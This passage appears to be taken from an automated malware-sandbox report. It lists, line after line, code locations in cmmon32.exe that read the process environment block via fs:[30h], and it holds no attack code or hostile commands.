Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B01C06 mov eax, dword ptr fs:[00000030h]	9_2_04B01C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B01C06 mov eax, dword ptr fs:[00000030h]	9_2_04B01C06
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B1740D mov eax, dword ptr fs:[00000030h]	9_2_04B1740D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B1740D mov eax, dword ptr fs:[00000030h]	9_2_04B1740D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B1740D mov eax, dword ptr fs:[00000030h]	9_2_04B1740D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A6746D mov eax, dword ptr fs:[00000030h]	9_2_04A6746D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A7A44B mov eax, dword ptr fs:[00000030h]	9_2_04A7A44B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04ADC450 mov eax, dword ptr fs:[00000030h]	9_2_04ADC450
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04ADC450 mov eax, dword ptr fs:[00000030h]	9_2_04ADC450
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A735A1 mov eax, dword ptr fs:[00000030h]	9_2_04A735A1
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A71DB5 mov eax, dword ptr fs:[00000030h]	9_2_04A71DB5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A71DB5 mov eax, dword ptr fs:[00000030h]	9_2_04A71DB5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A71DB5 mov eax, dword ptr fs:[00000030h]	9_2_04A71DB5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B105AC mov eax, dword ptr fs:[00000030h]	9_2_04B105AC
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B105AC mov eax, dword ptr fs:[00000030h]	9_2_04B105AC
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A72581 mov eax, dword ptr fs:[00000030h]	9_2_04A72581
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A72581 mov eax, dword ptr fs:[00000030h]	9_2_04A72581
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A72581 mov eax, dword ptr fs:[00000030h]	9_2_04A72581
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A72581 mov eax, dword ptr fs:[00000030h]	9_2_04A72581
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A42D8A mov eax, dword ptr fs:[00000030h]	9_2_04A42D8A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A42D8A mov eax, dword ptr fs:[00000030h]	9_2_04A42D8A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A42D8A mov eax, dword ptr fs:[00000030h]	9_2_04A42D8A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A42D8A mov eax, dword ptr fs:[00000030h]	9_2_04A42D8A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A42D8A mov eax, dword ptr fs:[00000030h]	9_2_04A42D8A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A7FD9B mov eax, dword ptr fs:[00000030h]	9_2_04A7FD9B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A7FD9B mov eax, dword ptr fs:[00000030h]	9_2_04A7FD9B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A5D5E0 mov eax, dword ptr fs:[00000030h]	9_2_04A5D5E0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A5D5E0 mov eax, dword ptr fs:[00000030h]	9_2_04A5D5E0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B0FDE2 mov eax, dword ptr fs:[00000030h]	9_2_04B0FDE2
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B0FDE2 mov eax, dword ptr fs:[00000030h]	9_2_04B0FDE2
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B0FDE2 mov eax, dword ptr fs:[00000030h]	9_2_04B0FDE2
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B0FDE2 mov eax, dword ptr fs:[00000030h]	9_2_04B0FDE2
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04AF8DF1 mov eax, dword ptr fs:[00000030h]	9_2_04AF8DF1
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04AC6DC9 mov eax, dword ptr fs:[00000030h]	9_2_04AC6DC9
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04AC6DC9 mov eax, dword ptr fs:[00000030h]	9_2_04AC6DC9
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04AC6DC9 mov eax, dword ptr fs:[00000030h]	9_2_04AC6DC9
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04AC6DC9 mov ecx, dword ptr fs:[00000030h]	9_2_04AC6DC9
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04AC6DC9 mov eax, dword ptr fs:[00000030h]	9_2_04AC6DC9
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04AC6DC9 mov eax, dword ptr fs:[00000030h]	9_2_04AC6DC9
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B18D34 mov eax, dword ptr fs:[00000030h]	9_2_04B18D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B0E539 mov eax, dword ptr fs:[00000030h]	9_2_04B0E539
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A53D34 mov eax, dword ptr fs:[00000030h]	9_2_04A53D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A53D34 mov eax, dword ptr fs:[00000030h]	9_2_04A53D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A53D34 mov eax, dword ptr fs:[00000030h]	9_2_04A53D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A53D34 mov eax, dword ptr fs:[00000030h]	9_2_04A53D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A53D34 mov eax, dword ptr fs:[00000030h]	9_2_04A53D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A53D34 mov eax, dword ptr fs:[00000030h]	9_2_04A53D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A53D34 mov eax, dword ptr fs:[00000030h]	9_2_04A53D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A53D34 mov eax, dword ptr fs:[00000030h]	9_2_04A53D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A53D34 mov eax, dword ptr fs:[00000030h]	9_2_04A53D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A53D34 mov eax, dword ptr fs:[00000030h]	9_2_04A53D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A53D34 mov eax, dword ptr fs:[00000030h]	9_2_04A53D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A53D34 mov eax, dword ptr fs:[00000030h]	9_2_04A53D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A53D34 mov eax, dword ptr fs:[00000030h]	9_2_04A53D34
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A4AD30 mov eax, dword ptr fs:[00000030h]	9_2_04A4AD30
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04ACA537 mov eax, dword ptr fs:[00000030h]	9_2_04ACA537
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A74D3B mov eax, dword ptr fs:[00000030h]	9_2_04A74D3B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A74D3B mov eax, dword ptr fs:[00000030h]	9_2_04A74D3B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A74D3B mov eax, dword ptr fs:[00000030h]	9_2_04A74D3B
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A6C577 mov eax, dword ptr fs:[00000030h]	9_2_04A6C577
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A6C577 mov eax, dword ptr fs:[00000030h]	9_2_04A6C577
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A83D43 mov eax, dword ptr fs:[00000030h]	9_2_04A83D43
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04AC3540 mov eax, dword ptr fs:[00000030h]	9_2_04AC3540
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A67D50 mov eax, dword ptr fs:[00000030h]	9_2_04A67D50
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04AC46A7 mov eax, dword ptr fs:[00000030h]	9_2_04AC46A7
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B10EA5 mov eax, dword ptr fs:[00000030h]	9_2_04B10EA5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B10EA5 mov eax, dword ptr fs:[00000030h]	9_2_04B10EA5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B10EA5 mov eax, dword ptr fs:[00000030h]	9_2_04B10EA5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04ADFE87 mov eax, dword ptr fs:[00000030h]	9_2_04ADFE87
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A716E0 mov ecx, dword ptr fs:[00000030h]	9_2_04A716E0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A576E2 mov eax, dword ptr fs:[00000030h]	9_2_04A576E2
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B18ED6 mov eax, dword ptr fs:[00000030h]	9_2_04B18ED6
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A736CC mov eax, dword ptr fs:[00000030h]	9_2_04A736CC
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04AFFEC0 mov eax, dword ptr fs:[00000030h]	9_2_04AFFEC0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A88EC7 mov eax, dword ptr fs:[00000030h]	9_2_04A88EC7
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A4E620 mov eax, dword ptr fs:[00000030h]	9_2_04A4E620
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04AFFE3F mov eax, dword ptr fs:[00000030h]	9_2_04AFFE3F
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A4C600 mov eax, dword ptr fs:[00000030h]	9_2_04A4C600
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A4C600 mov eax, dword ptr fs:[00000030h]	9_2_04A4C600
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A4C600 mov eax, dword ptr fs:[00000030h]	9_2_04A4C600
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A78E00 mov eax, dword ptr fs:[00000030h]	9_2_04A78E00
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B01608 mov eax, dword ptr fs:[00000030h]	9_2_04B01608
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A7A61C mov eax, dword ptr fs:[00000030h]	9_2_04A7A61C
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A7A61C mov eax, dword ptr fs:[00000030h]	9_2_04A7A61C
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A5766D mov eax, dword ptr fs:[00000030h]	9_2_04A5766D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A6AE73 mov eax, dword ptr fs:[00000030h]	9_2_04A6AE73
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A6AE73 mov eax, dword ptr fs:[00000030h]	9_2_04A6AE73
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A6AE73 mov eax, dword ptr fs:[00000030h]	9_2_04A6AE73
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A6AE73 mov eax, dword ptr fs:[00000030h]	9_2_04A6AE73
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A6AE73 mov eax, dword ptr fs:[00000030h]	9_2_04A6AE73
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A57E41 mov eax, dword ptr fs:[00000030h]	9_2_04A57E41
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A57E41 mov eax, dword ptr fs:[00000030h]	9_2_04A57E41
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A57E41 mov eax, dword ptr fs:[00000030h]	9_2_04A57E41
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A57E41 mov eax, dword ptr fs:[00000030h]	9_2_04A57E41
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A57E41 mov eax, dword ptr fs:[00000030h]	9_2_04A57E41
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A57E41 mov eax, dword ptr fs:[00000030h]	9_2_04A57E41
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B0AE44 mov eax, dword ptr fs:[00000030h]	9_2_04B0AE44
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B0AE44 mov eax, dword ptr fs:[00000030h]	9_2_04B0AE44
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A58794 mov eax, dword ptr fs:[00000030h]	9_2_04A58794
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04AC7794 mov eax, dword ptr fs:[00000030h]	9_2_04AC7794
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04AC7794 mov eax, dword ptr fs:[00000030h]	9_2_04AC7794
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04AC7794 mov eax, dword ptr fs:[00000030h]	9_2_04AC7794
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A837F5 mov eax, dword ptr fs:[00000030h]	9_2_04A837F5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A44F2E mov eax, dword ptr fs:[00000030h]	9_2_04A44F2E
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A44F2E mov eax, dword ptr fs:[00000030h]	9_2_04A44F2E
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A7E730 mov eax, dword ptr fs:[00000030h]	9_2_04A7E730
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A7A70E mov eax, dword ptr fs:[00000030h]	9_2_04A7A70E
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A7A70E mov eax, dword ptr fs:[00000030h]	9_2_04A7A70E
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A6F716 mov eax, dword ptr fs:[00000030h]	9_2_04A6F716
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B1070D mov eax, dword ptr fs:[00000030h]	9_2_04B1070D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B1070D mov eax, dword ptr fs:[00000030h]	9_2_04B1070D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04ADFF10 mov eax, dword ptr fs:[00000030h]	9_2_04ADFF10
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04ADFF10 mov eax, dword ptr fs:[00000030h]	9_2_04ADFF10
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A5FF60 mov eax, dword ptr fs:[00000030h]	9_2_04A5FF60
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B18F6A mov eax, dword ptr fs:[00000030h]	9_2_04B18F6A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A5EF40 mov eax, dword ptr fs:[00000030h]	9_2_04A5EF40
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A890AF mov eax, dword ptr fs:[00000030h]	9_2_04A890AF
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A720A0 mov eax, dword ptr fs:[00000030h]	9_2_04A720A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A720A0 mov eax, dword ptr fs:[00000030h]	9_2_04A720A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A720A0 mov eax, dword ptr fs:[00000030h]	9_2_04A720A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A720A0 mov eax, dword ptr fs:[00000030h]	9_2_04A720A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A720A0 mov eax, dword ptr fs:[00000030h]	9_2_04A720A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A720A0 mov eax, dword ptr fs:[00000030h]	9_2_04A720A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A7F0BF mov ecx, dword ptr fs:[00000030h]	9_2_04A7F0BF
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A7F0BF mov eax, dword ptr fs:[00000030h]	9_2_04A7F0BF
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A7F0BF mov eax, dword ptr fs:[00000030h]	9_2_04A7F0BF
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A49080 mov eax, dword ptr fs:[00000030h]	9_2_04A49080
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04AC3884 mov eax, dword ptr fs:[00000030h]	9_2_04AC3884
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04AC3884 mov eax, dword ptr fs:[00000030h]	9_2_04AC3884
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A458EC mov eax, dword ptr fs:[00000030h]	9_2_04A458EC
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04ADB8D0 mov eax, dword ptr fs:[00000030h]	9_2_04ADB8D0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04ADB8D0 mov ecx, dword ptr fs:[00000030h]	9_2_04ADB8D0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04ADB8D0 mov eax, dword ptr fs:[00000030h]	9_2_04ADB8D0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04ADB8D0 mov eax, dword ptr fs:[00000030h]	9_2_04ADB8D0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04ADB8D0 mov eax, dword ptr fs:[00000030h]	9_2_04ADB8D0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04ADB8D0 mov eax, dword ptr fs:[00000030h]	9_2_04ADB8D0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A7002D mov eax, dword ptr fs:[00000030h]	9_2_04A7002D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A7002D mov eax, dword ptr fs:[00000030h]	9_2_04A7002D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A7002D mov eax, dword ptr fs:[00000030h]	9_2_04A7002D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A7002D mov eax, dword ptr fs:[00000030h]	9_2_04A7002D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A7002D mov eax, dword ptr fs:[00000030h]	9_2_04A7002D
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A5B02A mov eax, dword ptr fs:[00000030h]	9_2_04A5B02A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A5B02A mov eax, dword ptr fs:[00000030h]	9_2_04A5B02A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A5B02A mov eax, dword ptr fs:[00000030h]	9_2_04A5B02A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A5B02A mov eax, dword ptr fs:[00000030h]	9_2_04A5B02A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B14015 mov eax, dword ptr fs:[00000030h]	9_2_04B14015
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B14015 mov eax, dword ptr fs:[00000030h]	9_2_04B14015
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04AC7016 mov eax, dword ptr fs:[00000030h]	9_2_04AC7016
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04AC7016 mov eax, dword ptr fs:[00000030h]	9_2_04AC7016
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04AC7016 mov eax, dword ptr fs:[00000030h]	9_2_04AC7016
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B02073 mov eax, dword ptr fs:[00000030h]	9_2_04B02073
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B11074 mov eax, dword ptr fs:[00000030h]	9_2_04B11074
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A60050 mov eax, dword ptr fs:[00000030h]	9_2_04A60050
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A60050 mov eax, dword ptr fs:[00000030h]	9_2_04A60050
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A761A0 mov eax, dword ptr fs:[00000030h]	9_2_04A761A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A761A0 mov eax, dword ptr fs:[00000030h]	9_2_04A761A0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04AC69A6 mov eax, dword ptr fs:[00000030h]	9_2_04AC69A6
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04AC51BE mov eax, dword ptr fs:[00000030h]	9_2_04AC51BE
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04AC51BE mov eax, dword ptr fs:[00000030h]	9_2_04AC51BE
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04AC51BE mov eax, dword ptr fs:[00000030h]	9_2_04AC51BE
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04AC51BE mov eax, dword ptr fs:[00000030h]	9_2_04AC51BE
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A7A185 mov eax, dword ptr fs:[00000030h]	9_2_04A7A185
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A6C182 mov eax, dword ptr fs:[00000030h]	9_2_04A6C182
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A72990 mov eax, dword ptr fs:[00000030h]	9_2_04A72990
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04AD41E8 mov eax, dword ptr fs:[00000030h]	9_2_04AD41E8
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A4B1E1 mov eax, dword ptr fs:[00000030h]	9_2_04A4B1E1
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A4B1E1 mov eax, dword ptr fs:[00000030h]	9_2_04A4B1E1
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A4B1E1 mov eax, dword ptr fs:[00000030h]	9_2_04A4B1E1
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A64120 mov eax, dword ptr fs:[00000030h]	9_2_04A64120
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A64120 mov eax, dword ptr fs:[00000030h]	9_2_04A64120
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A64120 mov eax, dword ptr fs:[00000030h]	9_2_04A64120
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A64120 mov eax, dword ptr fs:[00000030h]	9_2_04A64120
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A64120 mov ecx, dword ptr fs:[00000030h]	9_2_04A64120
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A7513A mov eax, dword ptr fs:[00000030h]	9_2_04A7513A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A7513A mov eax, dword ptr fs:[00000030h]	9_2_04A7513A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A49100 mov eax, dword ptr fs:[00000030h]	9_2_04A49100
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A49100 mov eax, dword ptr fs:[00000030h]	9_2_04A49100
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A49100 mov eax, dword ptr fs:[00000030h]	9_2_04A49100
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A4C962 mov eax, dword ptr fs:[00000030h]	9_2_04A4C962
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A4B171 mov eax, dword ptr fs:[00000030h]	9_2_04A4B171
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A4B171 mov eax, dword ptr fs:[00000030h]	9_2_04A4B171
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A6B944 mov eax, dword ptr fs:[00000030h]	9_2_04A6B944
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A6B944 mov eax, dword ptr fs:[00000030h]	9_2_04A6B944
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A452A5 mov eax, dword ptr fs:[00000030h]	9_2_04A452A5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A452A5 mov eax, dword ptr fs:[00000030h]	9_2_04A452A5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A452A5 mov eax, dword ptr fs:[00000030h]	9_2_04A452A5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A452A5 mov eax, dword ptr fs:[00000030h]	9_2_04A452A5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A452A5 mov eax, dword ptr fs:[00000030h]	9_2_04A452A5
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A5AAB0 mov eax, dword ptr fs:[00000030h]	9_2_04A5AAB0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A5AAB0 mov eax, dword ptr fs:[00000030h]	9_2_04A5AAB0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A7FAB0 mov eax, dword ptr fs:[00000030h]	9_2_04A7FAB0
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A7D294 mov eax, dword ptr fs:[00000030h]	9_2_04A7D294
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A7D294 mov eax, dword ptr fs:[00000030h]	9_2_04A7D294
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A72AE4 mov eax, dword ptr fs:[00000030h]	9_2_04A72AE4
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A72ACB mov eax, dword ptr fs:[00000030h]	9_2_04A72ACB
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A84A2C mov eax, dword ptr fs:[00000030h]	9_2_04A84A2C
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A84A2C mov eax, dword ptr fs:[00000030h]	9_2_04A84A2C
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B0AA16 mov eax, dword ptr fs:[00000030h]	9_2_04B0AA16
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04B0AA16 mov eax, dword ptr fs:[00000030h]	9_2_04B0AA16
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A58A0A mov eax, dword ptr fs:[00000030h]	9_2_04A58A0A
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A4AA16 mov eax, dword ptr fs:[00000030h]	9_2_04A4AA16
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A4AA16 mov eax, dword ptr fs:[00000030h]	9_2_04A4AA16
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A45210 mov eax, dword ptr fs:[00000030h]	9_2_04A45210
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A45210 mov ecx, dword ptr fs:[00000030h]	9_2_04A45210
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A45210 mov eax, dword ptr fs:[00000030h]	9_2_04A45210
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A45210 mov eax, dword ptr fs:[00000030h]	9_2_04A45210
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04A63A1C mov eax, dword ptr fs:[00000030h]	9_2_04A63A1C
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04AFB260 mov eax, dword ptr fs:[00000030h]	9_2_04AFB260
Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 9_2_04AFB260 mov eax, dword ptr fs:[00000030h]	9_2_04AFB260
